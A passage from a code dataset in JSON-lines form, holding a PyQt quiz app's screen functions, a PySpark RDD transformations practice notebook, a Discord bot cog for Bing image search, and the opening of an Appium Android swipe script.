20px;\"\r\n )\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place widgets on the grid\r\n grid.addWidget(widgets[\"message\"][-1], 2, 0)\r\n grid.addWidget(widgets[\"score\"][-1], 2, 1)\r\n grid.addWidget(widgets[\"message2\"][-1], 3, 0, 1, 2)\r\n grid.addWidget(widgets[\"button\"][-1], 4, 0, 1, 2)\r\n grid.addWidget(widgets[\"logo\"][-1], 5, 0, 2, 2)\r\n\r\n\r\n#*********************************************\r\n# FRAME 4 - FAIL\r\n#*********************************************\r\ndef frame4():\r\n #sorry widget\r\n message = QLabel(\"Sorry, this answer \\nwas wrong\\n your score is:\")\r\n message.setAlignment(QtCore.Qt.AlignRight)\r\n message.setStyleSheet(\r\n \"font-family: 'Shanti'; font-size: 35px; color: 'white'; margin: 75px 5px; padding:20px;\"\r\n )\r\n widgets[\"message\"].append(message)\r\n\r\n #score widget\r\n score = QLabel(str(parameters[\"score\"][-1]))\r\n score.setStyleSheet(\"font-size: 100px; color: white; margin: 0 75px 0px 75px;\")\r\n widgets[\"score\"].append(score)\r\n\r\n #button widget\r\n button = QPushButton('TRY AGAIN')\r\n button.setStyleSheet(\r\n '''*{\r\n padding: 25px 0px;\r\n background: '#BC006C';\r\n color: 'white';\r\n font-family: 'Arial';\r\n font-size: 35px;\r\n border-radius: 40px;\r\n margin: 10px 200px;\r\n }\r\n *:hover{\r\n background: '#ff1b9e';\r\n }'''\r\n )\r\n button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n button.clicked.connect(frame1)\r\n\r\n widgets[\"button\"].append(button)\r\n\r\n #logo widget\r\n pixmap = QPixmap('logo_bottom.png')\r\n logo = QLabel()\r\n logo.setPixmap(pixmap)\r\n logo.setAlignment(QtCore.Qt.AlignCenter)\r\n logo.setStyleSheet(\r\n \"padding :10px; margin-top:75px;\"\r\n )\r\n widgets[\"logo\"].append(logo)\r\n\r\n #place widgets on the grid\r\n grid.addWidget(widgets[\"message\"][-1], 1, 0)\r\n grid.addWidget(widgets[\"score\"][-1], 1, 1)\r\n grid.addWidget(widgets[\"button\"][-1], 2, 0, 1, 2)\r\n grid.addWidget(widgets[\"logo\"][-1], 3, 0, 1, 2)","repo_name":"eortegaa1500/NasaSpaceAppsChallenge","sub_path":"py_files/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":27307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14751897238","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n##Narrow Transformations\ninput_list=[1,2,3,4]\n\n\n# In[ ]:\n\n\ninput_rdd=sc.parallelize(input_list,4)\ninput_rdd.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_rdd.map(lambda x:x**2).collect()\n\n\n# In[ ]:\n\n\ndef power_list(x):\n return x**2\ninput_rdd.map(power_list).collect()\n\n\n# In[ ]:\n\n\ninput_list1=[\"Spark\",\"PySpark\",\"Python\",\"Hive\"]\ninput_rdd2=sc.parallelize(input_list1,4)\n\n\n# In[ ]:\n\n\ninput_rdd2.filter(lambda x:len(x)>=5).collect()\n\n\n# In[ ]:\n\n\nprint([i for i in input_list1 if len(i)>=5])\n\n\n# In[ ]:\n\n\nitera=list(filter(lambda x:len(x)>5,input_list1))\n\n\n# In[ ]:\n\n\nitera\n\n\n# In[ ]:\n\n\nlist(map(lambda x: len(x)>=5,input_list1))\n#map(lambda x: 'lower' if x < 3 else 'higher', lst)\n\n\n# In[ ]:\n\n\ndef more_than(x):\n if len(x)>=5:\n return x\ninput_rdd2.map(more_than).collect()\n \n\n\n# In[ ]:\n\n\ndef more_than_filter(x):\n if len(x)>=5:\n return x\ninput_rdd2.filter(more_than_filter).collect()\n\n\n# In[ ]:\n\n\ninput_rdd2.map(lambda x:len(x)>=5).collect()\n\n\n# In[ ]:\n\n\ndef filter_def(x):\n if len(x)>=5:\n return x\ndef map_def(x):\n x+=\" in Big Data\"\n return x\ninput_rdd2.filter(filter_def).map(map_def).collect()\n\n\n# In[ ]:\n\n\ninput_rdd2.filter(lambda x:len(x)>=5).map(lambda x:x+\" in Big Data\").collect()\n\n\n# In[ ]:\n\n\ninput_2d_list=[[\"Spark\",\"Scala\",\"PySpark\"],[\"Python\",\"Java\",\"CPP\"],[\"Spring Boot\",\"Flask\",\"Django\"]]\n\n\n# In[ ]:\n\n\ninput_rdd3=sc.parallelize(input_2d_list)\n\n\n# In[ ]:\n\n\ninput_rdd3.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_rdd3.flatMap(lambda x:x).collect()\n\n\n# In[ ]:\n\n\ninput_rdd3.flatMap(lambda x:x).count()\n\n\n# In[ ]:\n\n\ninput_rdd3.map(lambda x:x).collect()\n\n\n# In[ ]:\n\n\ninput_rdd3.map(lambda x:x).count()\n\n\n# In[ ]:\n\n\nlen(input_rdd3.flatMap(lambda x:x).collect())\n\n\n# In[ ]:\n\n\n#flatMap reduces the dimensions of the datastructure while map doesnt reduce the dimensions of the data structure\n\n\n# In[ ]:\n\n\n#Wide Transformations\n\n\n# In[ ]:\n\n\ninput_list_4=[1,2,3,4,4,3,2,1]\ninput_rdd4=sc.parallelize(input_list_4,4)\n\n\n# In[ ]:\n\n\ninput_rdd4.distinct().collect()\n\n\n# In[ ]:\n\n\ninput_rdd4.distinct().count()\n\n\n# In[ ]:\n\n\nlen(input_rdd4.distinct().collect())\n\n\n# In[ ]:\n\n\ninput_rdd4.distinct().take(input_rdd4.distinct().count())\n\n\n# In[ ]:\n\n\ninput_rdd4.distinct().takeOrdered(len(input_rdd4.collect()),key=None)\n\n\n# In[ ]:\n\n\ninput_rdd4.repartition(8)\n\n\n# In[ ]:\n\n\ninput_rdd4.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_rdd4.repartition(2)\n\n\n# In[ ]:\n\n\ninput_rdd4.getNumPartitions()\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('sh', 'pwd')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls /FileStore/')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls /user/')\n\n\n# In[ ]:\n\n\ndbutils.fs.help()\n\n\n# In[ ]:\n\n\ndbutils.fs.put(\"abcd5.txt\",\"Teja\",False)\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls')\n\n\n# In[ ]:\n\n\ninput_Rdd=sc.textFile('/abcd.txt')\n\n\n# In[ ]:\n\n\ninput_Rdd.collect()\n\n\n# In[ ]:\n\n\ndbutils.fs.help()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\ndbutils.fs.ls('/')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', 'ls')\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', \"ls '/FileStore/'\")\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('fs', \"ls '/FileStore/tables/'\")\n\n\n# In[ ]:\n\n\ninput_Rdd1=sc.textFile('/FileStore/tables/spark-3.txt')\n\n\n# In[ ]:\n\n\ninput_Rdd1.collect()\n\n\n# In[ ]:\n\n\ndbutils.fs.help()\n\n\n# In[ ]:\n\n\ninput_Rdd3=sc.textFile('/FileStore/tables/spark-2.txt',3)\n\n\n# In[ ]:\n\n\ninput_Rdd3.collect()\n\n\n# In[ ]:\n\n\ninput_Rdd1.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_Rdd3.getNumPartitions()\n\n\n# In[ ]:\n\n\n#Pair RDD\ninput_Pair=[(1,2),(2,4),(3,6),(4,8)]\ninput_Pair_RDD=sc.parallelize(input_Pair)\n\n\n# In[ ]:\n\n\ninput_Pair_RDD.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_Pair_RDD.mapValues(lambda a:a*10).collect()\n\n\n# In[ ]:\n\n\ndef multily(a):\n return a*10\ninput_Pair_RDD.mapValues(multily).collect()\n\n\n# In[ ]:\n\n\ndef multiply(a):\n return a*10\n \ninput_Pair_RDD.mapValues(multiply).collect()\n\n\n# In[ ]:\n\n\ndbutils.fs.ls('/')\n\n\n# In[ ]:\n\n\ndbutils.fs.ls('/FileStore')\n\n\n# In[ ]:\n\n\ndbutils.fs.ls('/FileStore/tables/')\n\n\n# In[ ]:\n\n\ndbutils.fs.help()\n\n\n# In[ ]:\n\n\nPair_list_1=[(\"Python\",\"OOPS\"),(\"Java\",\"OOPS\"),(\"Java\",\"SpringBoot\"),(\"Python\",\"FLASK\")]\nPair_list_2=[(\"Python\",\"PySpark\"),(\"Java\",\"Scala\"),(\"Java\",\"Hibernate\"),(\"Python\",\"AI\")]\n\nPair_RDD_1=sc.parallelize(Pair_list_1)\nPair_RDD_2=sc.parallelize(Pair_list_2)\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.count()\n\n\n# In[ ]:\n\n\nPair_RDD_2.count()\n\n\n# In[ ]:\n\n\nPair_RDD_1.getNumPartitions()\n\n\n# In[ ]:\n\n\nPair_RDD_1.reduceByKey(lambda a,b:b+\" Learning\",numPartitions=4).collect()\n\n\n# In[ ]:\n\n\ndef reducing(a,b):\n return b+\" Learning\"\nPair_RDD_1.reduceByKey(reducing,numPartitions=8).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\ndef multiply_1(a):\n return a*10\ndef filtering(b):\n return b[1]>50\ninput_Pair_RDD.mapValues(multiply_1).filter(filtering).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.getNumPartitions()\n\n\n# In[ ]:\n\n\nPair_RDD_1.reduceByKey(lambda acc,n:acc+\" & \"+n).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2.reduceByKey(lambda acc,n:acc+\" & \"+n).collect()\n\n\n# In[ ]:\n\n\ndef Joining(acc,n):\n return acc+\" & \"+n\n \nPair_RDD_1.reduceByKey(Joining).collect()\n\n\n# In[ ]:\n\n\ndef Joining_1(acc,N):\n return acc+\" ^ \"+N+\" Learning\"\nPair_RDD_2.reduceByKey(Joining_1).collect()\n\n\n# In[ ]:\n\n\ninitial_Value=0\nsc.accumulator(initial_Value).value\n\n\n# In[ ]:\n\n\ndef joining_using_ACC(initial_Value,N):\n return initial_Value+\" ACC \"+N\nPair_RDD_2.reduceByKey(joining_using_ACC).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.distinct().collect()\n\n\n# In[ ]:\n\n\nPair_RDD_3=sc.parallelize([(1,2),(1,2),(2,4),(2,5),(3,6),(4,5)],4)\n\n\n# In[ ]:\n\n\nPair_RDD_3.distinct().collect()\n\n\n# In[ ]:\n\n\nPair_RDD_3.count()\n\n\n# In[ ]:\n\n\nPair_RDD_3.distinct().reduceByKey(lambda acc,n:acc+n).collect()\n\n\n# In[ ]:\n\n\ndef check(a):\n return a[1]>5\nPair_RDD_3.distinct().reduceByKey(lambda acc,n:acc+n).filter(check).collect()\n\n\n# In[ ]:\n\n\ndef redu(a,b):\n return b+\" & \"+a\nPair_RDD_2.reduceByKey(redu).collect()\n\n\n# In[ ]:\n\n\nfrom functools import reduce\nl=[1,2,3]\ndef add_num(a,b):\n return a+b\nreduce(add_num,l)\n\n\n# In[ ]:\n\n\ninterset_1=[1,2,3,4,5,6,7]\ninput_RDD1=sc.parallelize(interset_1,4)\ninterset_2=[7,8,9,10,5,4,3,2,1]\ninput_RDD2=sc.parallelize(interset_2,4)\n\n\n# In[ ]:\n\n\ninput_RDD1.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_RDD2.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_RDD1.intersection(input_RDD2).collect()\n\n\n# In[ ]:\n\n\ninput_RDD1.intersection(input_RDD2).count()\n\n\n# In[ ]:\n\n\ninput_RDD3=sc.parallelize([1,2,3,4,5,4,3,2,1],4)\ninput_RDD4=sc.parallelize([2,3,4,5,1,2,3,4],4)\ninput_RDD3.intersection(input_RDD4).collect()\n\n\n# In[ ]:\n\n\ninput_RDD3.intersection(input_RDD4).count()\n\n\n# In[ ]:\n\n\ninput_RDD5=sc.parallelize([\"Java\",\"Python\",\"Spring Boot\",\"Flask\",\"Django\"],4)\ninput_RDD6=sc.parallelize([\"Flask\",\"Django\",\"Spring\"],4)\ninput_RDD5.intersection(input_RDD6).filter(lambda a:len(a)>5).collect()\n\n\n# In[ ]:\n\n\n#Joins\ninput_Join_1=sc.parallelize([1,2,3,4],4)\ninput_Join_2=sc.parallelize([5,6,7,8],4)\n\n\n# In[ ]:\n\n\ninput_Join_3=sc.parallelize([(1,2),(3,4)],4)\ninput_Join_4=sc.parallelize([(1,4),(1,5),(3,8)],4)\n\n\n# In[ ]:\n\n\ninput_Join_3.join(input_Join_4).collect()\n\n\n# In[ ]:\n\n\ndef appending(a):\n ans=[]\n for i in a:\n ans.append(\"Learning \"+i)\n return tuple(ans)\n \ninput_Join_5=sc.parallelize([(\"Java\",\"Scala\"),(\"Python\",\"Flask\")],4)\ninput_Join_6=sc.parallelize([(\"Java\",\"Spring\"),(\"Python\",\"Big Data\")],4)\n\ninput_Join_5.join(input_Join_6).mapValues(appending).collect()\n\n\n# In[ ]:\n\n\n\ninput_Join_7=sc.parallelize([(5,50),(6,60),(5,70)],4)\ninput_Join_8=sc.parallelize([(5,80),(6,90),(6,100)],4)\n\ninput_Join_7.join(input_Join_8).collect()\n\n\n# In[ ]:\n\n\ndef f(a):\n ans=[]\n for i in a:\n ans.append(i+100)\n return tuple(ans)\ninput_Join_7.join(input_Join_8).mapValues(f).collect()\n\n\n# In[ ]:\n\n\n#Left Join\ninput_Join_7.collect()\n\n\n# In[ ]:\n\n\ninput_Join_8.collect()\n\n\n# In[ ]:\n\n\ninput_Join_9=input_Join_8.union(sc.parallelize([(9,90),(10,100)],4))\ninput_Join_9.collect()\n\n\n# In[ ]:\n\n\ninput_Join_9.leftOuterJoin(input_Join_7).collect()\n\n\n# In[ ]:\n\n\ninput_Join_10=input_Join_7.union(sc.parallelize([(120,130),(140,150)],4))\ninput_Join_9.rightOuterJoin(input_Join_10).collect()\n\n\n# In[ ]:\n\n\ninput_Join_10.collect()\n\n\n# In[ ]:\n\n\ninput_Join_9.collect()\n\n\n# In[ ]:\n\n\ninput_Join_9.groupWith(input_Join_10).collect()\n\n\n# In[ ]:\n\n\ninput_L1=[(1,2),(1,4),(2,6)]\ninput_L2=[(1,8),(3,10),(3,20)]\ninput_L1_RDD=sc.parallelize(input_L1,4)\ninput_L2_RDD=sc.parallelize(input_L2,4)\n\n\n# In[ ]:\n\n\ninput_L1_RDD.join(input_L2_RDD).collect()\n\n\n# In[ ]:\n\n\ninput_L1_RDD.leftOuterJoin(input_L2_RDD).collect()\n\n\n# In[ ]:\n\n\ndef f(a,b):\n return sum(list(a))+sum(list(b))\n\ninput_L1_RDD.leftOuterJoin(input_L2_RDD).reduceByKey(f).collect()\n\n\n# In[ ]:\n\n\ndef f(a,b):\n return sum(list(a))+sum(list(b))\nfinal_list=input_L1_RDD.leftOuterJoin(input_L2_RDD).reduceByKey(f).collect()\nans=[]\nfor i in final_list:\n if type(i[1]) is tuple:\n ans.append((i[0],i[1][0]))\n else:\n ans.append(i)\nprint(ans)\n\n\n# In[ ]:\n\n\nPair_RDD_1=sc.parallelize([(\"Python\",4),(\"Java\",3),(\"Python\",5),(\"java\",4)],4)\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2=sc.parallelize([(\"Python\",10),(\"Java\",8)],4)\n\n\n# In[ ]:\n\n\nPair_RDD_2.collect()\n\n\n# In[ ]:\n\n\ndef a(a):\n ans=[]\n for i in a:\n ans.append(list(i))\n return ans\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).collect()\n\n\n# In[ ]:\n\n\ndef a(a):\n ans=[]\n for i in a:\n ans.append(list(i))\n return ans\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda x:x).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMap(lambda a:a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).groupByKey().mapValues(list).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\ndef f(a,b):\n z=[]\n z.append(a)\n z.append(b)\n return z\nPair_RDD_1.reduceByKey(f).collect()\n\n\n# In[ ]:\n\n\ndef a(ab):\n ans=[]\n for i in ab:\n ans.append(list(i))\n return ans\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).collect()\n\n\n# In[ ]:\n\n\ndef ab(a,b):\n z=[]\n z.append(list((a,b)))\n return z\n\nPair_RDD_1.cogroup(Pair_RDD_2).mapValues(a).flatMapValues(lambda a:a).groupByKey().mapValues(list).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_2.collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.join(Pair_RDD_2).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.join(Pair_RDD_2).mapValues(lambda a:list(a)).collect()\n\n\n# In[ ]:\n\n\ndef f(a,b):\n a.extend(b)\n return a\nPair_RDD_1.join(Pair_RDD_2).mapValues(lambda a:list(a)).reduceByKey(f).collect()\n\n\n# In[ ]:\n\n\nPair_RDD_1.join(Pair_RDD_2).mapValues(lambda a:list(a)).reduceByKey(f).mapValues(lambda a:sum(a)).collect()\n\n\n# In[ ]:\n\n\ninput_list=[(\"Kohli\",10),(\"virat\",20),(\"dhoni\",40),(\"virat\",50),(\"dhoni\",60)]\ninput_RDD=sc.parallelize(input_list,4)\n\n\n# In[ ]:\n\n\ninput_RDD.collect()\n\n\n# In[ ]:\n\n\n\ninput_RDD.groupByKey().mapValues(list).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.groupByKey().mapValues(list).mapValues(lambda a:sum(a)/len(a)).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.collect()\n\n\n# In[ ]:\n\n\ninput_RDD.pipe('cat').collect()\n\n\n# In[ ]:\n\n\ninput_RDD.pipe('ls').collect()\n\n\n# In[ ]:\n\n\ninput_RDD.pipe(\"pwd\").collect()\n\n\n# In[ ]:\n\n\ninput_RDD.pipe(\"pwd\").take(1)\n\n\n# In[ ]:\n\n\ninput_RDD.collect()\n\n\n# In[ ]:\n\n\ninput_RDD.reduceByKey(lambda a,b:a+b).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.groupByKey().mapValues(list).mapValues(lambda a:sum(a)/len(a)).collect()\n\n\n# In[ ]:\n\n\ndef first(a):\n return [a]\ndef second(a,b):\n a.append(b)\n return a\ndef third(a,b):\n a.extend(b)\n return a\ninput_RDD.combineByKey(first,second,third).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.collect()\n\n\n# In[ ]:\n\n\ndef first(a):\n return (a,1)\ndef second(a,b):\n return a[0]+b,a[1]+1\ndef third(a,b):\n return (a[0]+b[0],a[1]+b[1])\ninput_RDD.combineByKey(first,second,third).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.combineByKey(first,second,third).mapValues(lambda a:a[0]/a[1]).collect()\n\n\n# In[ ]:\n\n\ninput_RDD.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_RDD.repartition(5)\n\n\n# In[ ]:\n\n\ninput_RDD.getNumPartitions()\n\n\n# In[ ]:\n\n\ninput_RDD.coalesce(5)\n\n\n# In[ ]:\n\n\ninput_RDD.getNumPartitions()\n\n\n# In[ ]:\n\n\ndef first(a):\n return (a,1)\ndef second(a,b):\n return a[0]+b,a[1]+1\ndef third(a,b):\n return (a[0]+b[0],a[1]+b[1])\nimport time\nbegin=time.time()\ninput_RDD.groupByKey().mapValues(list).mapValues(lambda a:sum(a)/len(a)).collect()\nend=time.time()\nexec_time=end-begin\nprint(exec_time)\nbegin_1=time.time()\ninput_RDD.combineByKey(first,second,third).mapValues(lambda a:a[0]/a[1]).collect()\nend_1=time.time()\nexec_time_1=end_1-begin_1\nprint(exec_time_1)\n\n\n# In[ ]:\n\n\ninput_RDD.repartition(2).getNumPartitions()\n\n\n# In[ ]:\n\n\nimport time\nrepartition_time_begin=time.time()\nprint(input_RDD.repartition(2).getNumPartitions())\nrepartition_time_end=time.time()\nrepartition_time=repartition_time_end-repartition_time_begin\ncoalesce_time_begin=time.time()\nprint(input_RDD.coalesce(2).getNumPartitions())\ncoalesce_time_end=time.time()\ncoalesce_time=coalesce_time_end-coalesce_time_begin\nprint(repartition_time)\nprint(coalesce_time)\n\n\n# In[ ]:\n\n\ndef second(a,b):\n return a+b\ndef third(a,b):\n return a+b\ninput_RDD.aggregateByKey((0),second,third).collect()\n\n\n# In[ ]:\n\n\nword_list=[(\"hello\",1),(\"world\",1),(\"hello\",1)]\nword_RDD=sc.parallelize(word_list,4)\nword_RDD.reduceByKey(lambda a,b:a+b).collect()\n\n\n# In[ ]:\n\n\ninput_str=\"I am new to Hadoop Hadoop is a Distributed Hadoop is a ecosystem\"\ninput_list=input_str.split()\ninput_tu=[(i,1) for i in input_list]\nprint(input_tu)\n\n\n# In[ ]:\n\n\nword_RDD_1=sc.parallelize(input_tu,4)\nword_RDD_1.reduceByKey(lambda a,b:a+b).takeOrdered(2)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"phaniteja5789/SparkRDD","sub_path":"RDD/Transformations_Practice.py","file_name":"Transformations_Practice.py","file_ext":"py","file_size_in_byte":13889,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19554246796","text":"\"\"\"Query cog module.\n\nThe query cog contains methods and attributes used to async query the\nBing Image Search API V7.0 for images based on a query string and some\ndefined parameters. \n\"\"\"\n\n# Standard Library imports\nimport aiohttp\nfrom io import BytesIO\nimport os\nfrom dotenv import load_dotenv\n# Discord and discord extension library imports\nimport discord\nfrom discord.ext import commands\n\n\nclass Query(commands.Cog):\n \"\"\"Class that defines an image request cog.\n\n Creates an image search request and async sends it to the Bing Image\n Search V7.0 API in response to user request. Must be loaded before\n the Editor cog in order to provide it with the selected image.\n \"\"\"\n\n def __init__(\n self, bot, mkt='en-US', result_count=5, \n moderation='Moderate', minDim=(120, 120), \n maxDim=(1024, 1024)):\n \"\"\"Init method for the Query cog\"\"\"\n self.bot = bot\n\n load_dotenv()\n self.api_key = os.getenv('BS_API_KEY')\n self.endpoint = os.getenv('END_POINT') + \"v7.0/images/search\"\n \n self.query = None\n self.market = mkt\n self.result_count = result_count\n self.offset = 0\n self.moderation = moderation\n self.minDim = minDim\n self.maxDim = maxDim\n\n self.params = {\n 'q': self.query, 'mkt': self.market, 'count': self.result_count, \n 'offset': self.offset,'safeSearch': moderation,\n 'minWidth': minDim[0], 'minHeight': minDim[1], \n 'maxWidth': maxDim[0], 'maxHeight': maxDim[1]\n }\n \n self.url_list = None\n self.img_list = None\n self.selected_image = None\n\n async def cog_check(self, ctx):\n \"\"\"Cog level context checker.\n \n Is called and evaluated whenever a command is mentioned.\n Checks whether the command has been used in a dm channel.\n \"\"\"\n if isinstance(ctx.channel, discord.DMChannel): return True\n else: return False\n\n @commands.group(name='find', \n help=\"Finds and returns images based on a descriptive query.\",\n invoke_without_command=True)\n async def find(self, ctx, *, arg: str):\n \"\"\" Finds images based on the query param \"\"\"\n\n headers = {'Ocp-Apim-Subscription-Key': self.api_key}\n self.query = arg\n self.update_params()\n if self.query is not None:\n await ctx.send(\"Finding image results for \" + arg + \". Please wait...\")\n # Calls the API\n async with aiohttp.ClientSession() as session:\n async with session.get(self.endpoint, headers=headers, params=self.params) as response:\n #image_urls = []\n if response.status == 200:\n search_results = await response.json()\n self.url_list = [img[\"contentUrl\"] for img in search_results[\"value\"][:self.result_count]]\n else:\n self.url_list = None\n await session.close()\n if self.url_list is not None:\n self.img_list = []\n async with aiohttp.ClientSession() as session:\n for i in range(self.result_count):\n async with session.get(self.url_list[i]) as image_data:\n if image_data.status == 200:\n image_bytes = BytesIO(await image_data.read())\n if image_bytes is not None:\n await ctx.send(file=discord.File(image_bytes, str(i + 1) + '.jpg'))\n print(image_bytes)\n self.img_list.append(image_bytes)\n else:\n self.img_list.append(None)\n await ctx.send(\"An unexpected error occured while retrieving this image.\")\n await session.close()\n \n @find.command(name='more', \n help=\"Command used to find more images for the same query.\")\n async def find_more(self, ctx, *, arg):\n pass\n \n @commands.command(name='select', help=\"Command used to select one of the images for editing.\")\n async def select(self, ctx, choice: int):\n if self.img_list is not None:\n if choice > 0 and choice <= self.result_count:\n # +1 and -1 are used in this section of the code to account for the fact that users are\n # likely to enter numbers from 1 to 5 rather than 0 to 4 (max list range)\n if self.img_list[choice - 1] is not None: \n self.selected_image = self.img_list[choice - 1]\n self.selected_image.seek(0) #The seek method is used in case the file was sent before. This would mess with the seek position of the file object\n await ctx.send(\"Image number \" + str(choice) + \" was successfully selected.\")\n else: \n await ctx.send(\"An unexpected error occured while retrieving this image. Please select another.\")\n else:\n await ctx.send(\"Please enter a valid choice from between 1 to \" + str(self.result_count) + \".\")\n else:\n await ctx.send(\"You need to use the !find command to search for a list of images before you can use this command.\")\n \n @commands.command(name='upload', \n help=\"Command that can be used to upload an image to be edited.\"\n \" Please upload only a single image for editing.\"\n \" If multiple images are uploaded, only the first image will be selected\" \n \" for editing. Only .jpg, .jpeg and .png files are currently supported.\")\n async def upload(self, ctx):\n attachment = None\n accepted_extension_list = ['.jpg', '.jpeg', '.png']\n if len(ctx.message.attachments) > 0:\n attachment = ctx.message.attachments[0]\n print(\"done\")\n else:\n await ctx.send(\"You need to upload an attachment when using this command\")\n return\n for extension in accepted_extension_list:\n if attachment.filename.endswith(extension):\n image_bytes = BytesIO()\n await attachment.save(image_bytes)\n self.selected_image = image_bytes\n print(self.selected_image)\n await ctx.send(\"Image upload successful.\")\n return\n await ctx.send(\"This filename extension is not supported.\")\n \n @commands.command(name='show', help=\"Command used to show the currently selected image.\")\n async def show(self, ctx):\n if self.selected_image is not None:\n print(self.selected_image)\n await ctx.send(file=discord.File(self.selected_image, 'selected_image.jpg'))\n self.selected_image.seek(0)\n else:\n await ctx.send(\"You need to select an image before using this command.\")\n\n @commands.command(name='edit', \n help=\"Command used to load the image editor. An image needs to be\"\n \" selected before using this command. You will be unable to use the\" \n \" query and find commands once you use this command.\")\n async def edit(self,ctx):\n if self.selected_image is not None:\n #self.bot.unload_extension(f'cogs.query')\n self.bot.load_extension(f'cogs.editor')\n await ctx.send(\"The editor has been loaded. You can use commands like !caption top or !whitespace top to edit your image.\")\n else:\n await ctx.send(\"You need to select an image before you can edit it.\")\n \n def update_params(self):\n \"\"\"Updates the parameter string. \n \n Checks the entered parameters for errors and updates the params\n attribute if none are found.\n \"\"\"\n if len(self.query.strip()) > 100: return # We enforce a hard limit of 100 characters on search queries.\n if self.result_count > 5: return # We enforce a 5 image limit on results \n # to prevent one user from taking up too much bandwith\n self.params = {'q': self.query, 'mkt': self.market, 'count' : self.result_count, 'offset': self.offset,'safeSearch' : self.moderation,\n 'minWidth' : self.minDim[0], 'minHeight' : self.minDim[1], 'maxWidth' : self.maxDim[0], 'maxHeight' : self.maxDim[1]}\n \n def get_selected_image(self):\n \"\"\"Returns selected image attribute.\n\n Used by the Editor cog to retrieve the selected image from the\n Query cog. \n \"\"\"\n return self.selected_image\n\n\ndef setup(bot):\n bot.add_cog(Query(bot))","repo_name":"moooserstupid/MemeMakerBot","sub_path":"cogs/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71295287587","text":"from time import sleep\nfrom appium import webdriver\ndesired_caps={}\ndesired_caps['platformName']='Android'\ndesired_caps['platformVersion']='4.4.2'\ndesired_caps['deviceName']='MI_6'\ndesired_caps['appPackage']='com.ihimee.bwqs'\ndesired_caps['appActivity']='com.himee.LogoActivity'\ndriver=webdriver.Remote('http://127.0.0.1:4723/wd/hub',desired_caps)\n#滑屏\nsleep(5)\nsize=driver.get_window_size()\nwidth=size.get('width')\nheight=size.get('height')\ndriver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\ndriver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n#driver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n# driver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n# driver.swipe(size['width']*0.7,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n# sleep(2)\n# driver.swipe(size['width']*0.8,size['height']*0.3,size['width']*0.1,size['height']*0.3,1000)\n# driver.swipe(700,500,100,500,1000)\n# 